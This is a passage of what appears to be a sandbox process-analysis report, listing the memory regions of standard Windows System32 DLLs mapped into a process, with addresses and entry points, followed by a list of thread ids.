"c:\\windows\\system32\\wcmcsp.dll") Region: id = 3522 start_va = 0x7ffb1dbc0000 end_va = 0x7ffb1dc58fff monitored = 0 entry_point = 0x7ffb1dbda090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 3523 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3524 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3525 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3526 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3527 start_va = 0x7ffb1dea0000 end_va = 0x7ffb1dee7fff monitored = 0 entry_point = 0x7ffb1deaa1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 3528 start_va = 0x7ffb1def0000 end_va = 0x7ffb1df4cfff monitored = 0 entry_point = 0x7ffb1df02bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3529 start_va = 0x7ffb1e710000 end_va = 0x7ffb1e81afff monitored = 0 entry_point = 0x7ffb1e752610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 3530 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 3531 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3532 start_va = 0x7ffb20ec0000 end_va = 0x7ffb20f2ffff monitored = 0 entry_point = 0x7ffb20ee2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 3533 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3534 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3535 start_va = 0x7ffb215b0000 end_va = 0x7ffb215f9fff monitored = 0 entry_point = 0x7ffb215bac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 3536 start_va = 0x7ffb21960000 end_va = 0x7ffb21b10fff monitored = 0 entry_point = 0x7ffb219b3690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 3537 start_va = 0x7ffb22410000 end_va = 0x7ffb22418fff monitored = 0 entry_point = 0x7ffb224119a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 3538 start_va = 0x7ffb22420000 end_va = 0x7ffb2242afff monitored = 0 entry_point = 0x7ffb22421cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 3539 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3540 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3541 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3542 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3543 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 3544 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3545 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3546 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3547 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3548 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3549 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3550 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3551 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3552 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3553 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3554 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3555 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3556 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3557 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3558 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3559 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3560 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3561 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3562 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3563 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3564 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3565 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3566 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3567 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3568 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3569 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3570 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3571 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3572 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3573 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3574 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3575 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3576 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3745 start_va = 0x5d0000 end_va = 0x5d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "aeevts.dll" filename = "\\Windows\\System32\\aeevts.dll" (normalized: "c:\\windows\\system32\\aeevts.dll") Region: id = 3751 start_va = 0xfe0000 end_va = 0x10b9fff monitored = 0 entry_point = 0x1013c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 3752 start_va = 0x5d0000 end_va = 0x5f4fff monitored = 0 entry_point = 0x5db320 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Thread: id = 146 os_tid = 0x13b4 Thread: id = 147 os_tid = 0x470 Thread: id = 148 os_tid = 0xdd0 Thread: id = 149 os_tid = 0xc30 Thread: id = 150 os_tid = 0x11bc Thread: id = 151 os_tid = 0x110c Thread: id = 152 os_tid = 0x628 Thread: id = 153 os_tid = 0xa30 Thread: id = 154 os_tid = 0xd44 Thread: id = 155 os_tid = 0x8fc Thread: id = 156 os_tid = 0x4a0 Thread: id = 157 os_tid = 0x490 Thread: id = 158 os_tid = 0x45c Thread: id = 159 os_tid = 0x438 Thread: id = 160 os_tid = 0x428 Thread: id = 161 os_tid = 0x420 Thread: id = 162 os_tid = 0x268 Thread: id = 163 os_tid = 0x194 Thread: id = 164 os_tid = 0x190 Thread: id = 165 os_tid = 0x18c Thread: id = 166 os_tid = 0x124 Thread: id = 167 os_tid = 0x3f8 Thread: id = 168 os_tid = 0x3f4 Thread: id = 169 os_tid = 0x380